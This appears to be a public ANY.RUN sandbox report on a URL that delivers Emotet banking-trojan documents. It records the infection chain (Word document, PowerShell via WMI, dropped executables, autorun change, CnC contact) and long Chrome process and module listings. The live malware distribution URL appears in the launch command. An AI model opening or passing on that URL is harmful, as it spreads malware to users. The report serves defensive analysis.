General Info

URL

https://m3creativemedia.com/780a0b/4nuwnadjz4_45lhp-76334341292/

Full analysis
https://app.any.run/tasks/dc0f35a0-36a3-4e31-a043-980fa6591e23
Verdict
Malicious activity
Analysis date
10/9/2019, 17:51:35
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

emotet-doc

emotet

banker

trojan

Indicators:

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Emotet process was detected
  • 178.exe (PID: 4076)
Application was dropped or rewritten from another process
  • 178.exe (PID: 4076)
  • msptermsizes.exe (PID: 3216)
  • 178.exe (PID: 3112)
  • msptermsizes.exe (PID: 3048)
EMOTET was detected
  • msptermsizes.exe (PID: 3216)
Changes the autorun value in the registry
  • msptermsizes.exe (PID: 3216)
Drops known malicious document
  • WINWORD.EXE (PID: 2780)
  • chrome.exe (PID: 2980)
Connects to CnC server
  • msptermsizes.exe (PID: 3216)
Executable content was dropped or overwritten
  • powershell.exe (PID: 2604)
  • 178.exe (PID: 4076)
PowerShell script executed
  • powershell.exe (PID: 2604)
Application launched itself
  • WINWORD.EXE (PID: 2780)
Starts itself from another location
  • 178.exe (PID: 4076)
Executed via WMI
  • powershell.exe (PID: 2604)
Creates files in the user directory
  • powershell.exe (PID: 2604)
Starts Microsoft Office Application
  • WINWORD.EXE (PID: 2780)
  • chrome.exe (PID: 2980)
Modifies files in Chrome extension folder
  • chrome.exe (PID: 2980)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2504)
  • WINWORD.EXE (PID: 2780)
Reads the hosts file
  • chrome.exe (PID: 2980)
  • chrome.exe (PID: 2304)
Creates files in the user directory
  • WINWORD.EXE (PID: 2780)
Application launched itself
  • chrome.exe (PID: 2980)
Reads Internet Cache Settings
  • chrome.exe (PID: 2980)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Screenshots

Processes

Total processes
74
Monitored processes
38
Malicious processes
7
Suspicious processes
0

Behavior graph

+
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe 178.exe no specs #EMOTET 178.exe msptermsizes.exe no specs #EMOTET msptermsizes.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2980
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://m3creativemedia.com/780a0b/4nuwnadjz4_45lhp-76334341292/"
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\hid.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\winusb.dll
c:\windows\system32\msi.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mscms.dll
c:\windows\system32\winsta.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\wpc.dll
c:\windows\system32\samlib.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\wbem\wmiperfinst.dll
c:\windows\system32\pdh.dll
c:\windows\system32\audioses.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\npmproxy.dll
c:\windows\installer\{90140000-003d-0000-0000-0000000ff1ce}\wordicon.exe
c:\windows\system32\mssprxy.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\imagehlp.dll
c:\program files\winrar\rarext.dll
c:\program files\microsoft office\office14\olkfstub.dll
c:\progra~1\micros~1\office14\mlshext.dll
c:\program files\microsoft office\office14\onfilter.dll
c:\program files\microsoft office\office14\visshe.dll
c:\program files\common files\microsoft shared\office14\msoshext.dll
c:\program files\microsoft office\office14\msohevi.dll
c:\windows\system32\mf.dll
c:\windows\system32\shdocvw.dll
c:\program files\filezilla ftp client\fzshellext.dll
c:\windows\system32\syncui.dll
c:\program files\notepad++\nppshell_06.dll
c:\program files\windows sidebar\sbdrop.dll
c:\windows\system32\stobject.dll
c:\windows\system32\cryptext.dll
c:\windows\system32\colorui.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\winspool.drv
c:\windows\system32\winshfhc.dll
c:\windows\system32\wdscore.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\msiltcfg.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\sxs.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\devrtl.dll
c:\windows\system32\mpr.dll

PID
3656
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6e12a9d0,0x6e12a9e0,0x6e12a9ec
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID
2800
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2984 --on-initialized-event-handle=312 --parent-handle=316 /prefetch:6
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_watcher.dll

PID
4028
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=15976714935304784786 --mojo-platform-channel-handle=952 --ignored=" --type=renderer " /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll
c:\windows\system32\d3dcompiler_47.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\program files\google\chrome\application\75.0.3770.100\swiftshader\libglesv2.dll
c:\program files\google\chrome\application\75.0.3770.100\swiftshader\libegl.dll

PID
2304
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --service-request-channel-token=18035048643258853069 --mojo-platform-channel-handle=1640 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ntmarta.dll

PID
3904
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16965193788874250319 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2228 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2688
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8960056549652060211 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2248 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2920
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8076118706695724888 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2464 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
